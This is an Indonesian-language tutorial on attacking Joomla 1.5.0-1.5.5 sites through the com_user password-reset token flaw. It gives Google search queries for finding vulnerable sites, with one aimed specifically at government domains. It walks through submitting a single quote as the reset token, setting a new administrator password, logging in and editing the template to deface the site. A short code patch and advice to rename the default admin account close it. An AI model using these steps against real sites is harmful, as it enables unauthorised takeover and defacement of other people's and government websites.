Exploit Joomla com_user

1. cari situs yang dibangun menggunakan joomla, minta bantuan paman google. kata kunci: inurl:option=com_user
atau
inurl:option=com_user site:go.id -->khusus untuk situs pemerintah

2. temukan situs target misalnya:
http://www.target.go.id/index.php?option=com_user&view=login&.....dst

3. ganti alamat tersebut sehingga menjadi
http://www.target.go.id/index.php?option=com_user&view=reset&layout=confirm

4. pada form input yang tampil berikan tanda token tanda ' (tanda petik tunggal) lalu klik kirim

5. jika berhasil maka akan keluar form untuk mereset password. masukan password baru sesuai yang kita inginkan


6. klik submit atau enter maka password default administrator joomla akan di rubah

7. langkah selanjutnya masuk ke halaman login administator
alamatnya: http://www.target.go.id/administrator

masukan username : admin
password : (sesuai yang telah kita masukan waktu di reset)

LOGIN berhasil?

8. jika berhasil masuk ke menu Template manajer, cari template yang bertanda bintang dan rubah index.php dengan kode HTML yang kita inginkan

ket: (
a. khusus untuk joomla 1.5.x tepat nya 1.5.0 - 1.5.5 diatas 1.5.5 gak bisa udah di patch
b. administrator situs belum merubah default user administrator
c. untuk joomla 1.5.x yang belum di patch

cara melakukan Patch joomla supaya tidak bisa di hack seperti cara di atas:

1. buka file yang ada di folder component/com_user/model/reset.php
2. tambahkan script berikut (pada baris 113)

if(strlen($token) != 32) {
$this->setError(JText::_('INVALID_TOKEN'));
return false;
}

di bawah script : global $mainframe;

untuk menambah keamanan ganti default user administrator (admin) dengan yang lain.